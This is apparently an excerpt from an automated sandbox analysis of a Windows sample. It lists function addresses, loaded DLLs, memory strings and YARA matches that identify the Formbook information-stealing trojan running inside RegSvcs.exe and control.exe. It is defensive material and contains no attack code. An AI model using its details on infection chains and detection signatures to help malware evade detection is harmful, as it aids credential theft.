Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EECD1F	8_2_04EECD1F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0EEDB	8_2_04F0EEDB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0CE93	8_2_04F0CE93
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E62E90	8_2_04E62E90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E50E59	8_2_04E50E59
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0EE26	8_2_04F0EE26
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42FC8	8_2_04E42FC8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ECEFA0	8_2_04ECEFA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC4F40	8_2_04EC4F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E92F28	8_2_04E92F28
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E70F30	8_2_04E70F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF2F30	8_2_04EF2F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E7E8F0	8_2_04E7E8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E368B8	8_2_04E368B8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E52840	8_2_04E52840
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5A840	8_2_04E5A840
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E529A0	8_2_04E529A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F1A9A6	8_2_04F1A9A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E66962	8_2_04E66962
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4EA80	8_2_04E4EA80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F06BD7	8_2_04F06BD7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0AB40	8_2_04F0AB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E41460	8_2_04E41460
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0F43F	8_2_04F0F43F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F195C3	8_2_04F195C3
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EED5B0	8_2_04EED5B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F07571	8_2_04F07571
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F016CC	8_2_04F016CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E95630	8_2_04E95630
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0F7B0	8_2_04F0F7B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0F0E0	8_2_04F0F0E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F070E9	8_2_04F070E9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EFF0CC	8_2_04EFF0CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E570C0	8_2_04E570C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5B1B0	8_2_04E5B1B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E8516C	8_2_04E8516C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3F172	8_2_04E3F172
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F1B16B	8_2_04F1B16B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF12ED	8_2_04EF12ED
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6D2F0	8_2_04E6D2F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6B2C0	8_2_04E6B2C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E552A0	8_2_04E552A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E9739A	8_2_04E9739A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3D34C	8_2_04E3D34C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0132D	8_2_04F0132D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0FCF2	8_2_04F0FCF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC9C32	8_2_04EC9C32
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6FDC0	8_2_04E6FDC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F07D73	8_2_04F07D73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E53D40	8_2_04E53D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F01D5A	8_2_04F01D5A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59EB0	8_2_04E59EB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E13FD2	8_2_04E13FD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E13FD5	8_2_04E13FD5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0FFB1	8_2_04F0FFB1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E51F92	8_2_04E51F92
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0FF09	8_2_04F0FF09
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E538E0	8_2_04E538E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EBD800	8_2_04EBD800
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59950	8_2_04E59950
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6B950	8_2_04E6B950
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE5910	8_2_04EE5910
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EFDAC6	8_2_04EFDAC6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EEDAAC	8_2_04EEDAAC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E95AA0	8_2_04E95AA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF1AA3	8_2_04EF1AA3
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC3A6C	8_2_04EC3A6C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F07A46	8_2_04F07A46
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0FA49	8_2_04F0FA49
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E8DBF9	8_2_04E8DBF9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC5BF0	8_2_04EC5BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6FB80	8_2_04E6FB80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0FB76	8_2_04F0FB76
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDE7A0	8_2_00CDE7A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CC2D87	8_2_00CC2D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CC2D90	8_2_00CC2D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CC2FB0	8_2_00CC2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDD596	8_2_00CDD596
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDDB2A	8_2_00CDDB2A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CC9E4B	8_2_00CC9E4B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CC9E50	8_2_00CC9E50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDDE60	8_2_00CDDE60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019E7E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A1F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A0EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019D5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0198B970 appears 262 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04E3B970 appears 262 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04E97E54 appears 107 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04EBEA12 appears 86 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04ECF290 appears 103 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04E85130 appears 58 times

Source: z2______________________________.exe, 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs z2______________________________.exe
Source: z2______________________________.exe, 00000000.00000000.1634199684.0000000000298000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSXEhCiY.exe" vs z2______________________________.exe
Source: z2______________________________.exe, 00000000.00000002.1680655312.00000000026B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs z2______________________________.exe
Source: z2______________________________.exe, 00000000.00000002.1687357786.0000000007450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs z2______________________________.exe
Source: z2______________________________.exe, 00000000.00000002.1678616159.000000000085E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs z2______________________________.exe
Source: z2______________________________.exe, 00000000.00000002.1688429391.00000000092D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E vs z2______________________________.exe
Source: z2______________________________.exe	Binary or memory string: OriginalFilenameSXEhCiY.exe" vs z2______________________________.exe

Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wininet.dll	Jump to behavior

Source: z2______________________________.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: z2______________________________.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
